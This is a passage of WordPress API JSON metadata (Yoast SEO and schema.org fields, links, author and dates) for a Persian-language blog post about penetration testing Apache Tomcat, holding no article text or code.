\u0644\u06cc\u0627\u0646\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/apache-tomcat-rce-exploit-1.png\",\"datePublished\":\"2025-05-24T11:25:21+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\"},\"description\":\"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#breadcrumb\"},\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fa-IR\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#primaryimage\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/apache-tomcat-rce-exploit-1.png\",\"contentUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/apache-tomcat-rce-exploit-1.png\",\"width\":728,\"height\":380,\"caption\":\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 
Tomcat\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u062e\u0627\u0646\u0647\",\"item\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\",\"name\":\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\",\"description\":\"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fa-IR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\",\"name\":\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\",\"sameAs\":[\"https:\\\/\\\/liangroup.net\"],\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/author\\\/s-teymouri\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. 
-->","yoast_head_json":{"title":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/","og_locale":"fa_IR","og_type":"article","og_title":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat","og_description":"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.","og_url":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/","og_site_name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","article_published_time":"2025-05-24T11:25:21+00:00","og_image":[{"width":728,"height":380,"url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png","type":"image\/png"}],"author":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","twitter_card":"summary_large_image","twitter_creator":"@liansecurity","twitter_site":"@liansecurity","twitter_misc":{"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646":"15 
\u062f\u0642\u06cc\u0642\u0647"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#article","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/"},"author":{"name":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a"},"headline":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat","datePublished":"2025-05-24T11:25:21+00:00","mainEntityOfPage":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/"},"wordCount":320,"commentCount":0,"image":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png","articleSection":["\u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u0644\u06cc\u0627\u0646","\u0645\u0642\u0627\u0644\u0627\u062a \u062a\u0633\u062a \u0646\u0641\u0648\u0630","\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f"],"inLanguage":"fa-IR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/","url":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/","name":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 
\u0644\u06cc\u0627\u0646","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#primaryimage"},"image":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png","datePublished":"2025-05-24T11:25:21+00:00","author":{"@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a"},"description":"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.","breadcrumb":{"@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#breadcrumb"},"inLanguage":"fa-IR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/"]}]},{"@type":"ImageObject","inLanguage":"fa-IR","@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#primaryimage","url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png","contentUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png","width":728,"height":380,"caption":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat"},{"@type":"BreadcrumbList","@id":"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u062e\u0627\u0646\u0647","item":"https:\/\/liangroup.net\/blog\/"},{"@type":"ListItem","position":2,"name":"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat"}]},{"@type":"WebSite","@id":"https:\/\/liangroup.net\/blog\/#website","url":"https:\/\/liangroup.net\/blog\/","name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 
\u0644\u06cc\u0627\u0646","description":"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/liangroup.net\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fa-IR"},{"@type":"Person","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a","name":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","sameAs":["https:\/\/liangroup.net"],"url":"https:\/\/liangroup.net\/blog\/author\/s-teymouri\/"}]}},"_links":{"self":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/19472","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/users\/14"}],"replies":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/comments?post=19472"}],"version-history":[{"count":0,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/19472\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media\/19501"}],"wp:attachment":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media?parent=19472"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/categories?post=19472"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/tags?post=19472"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}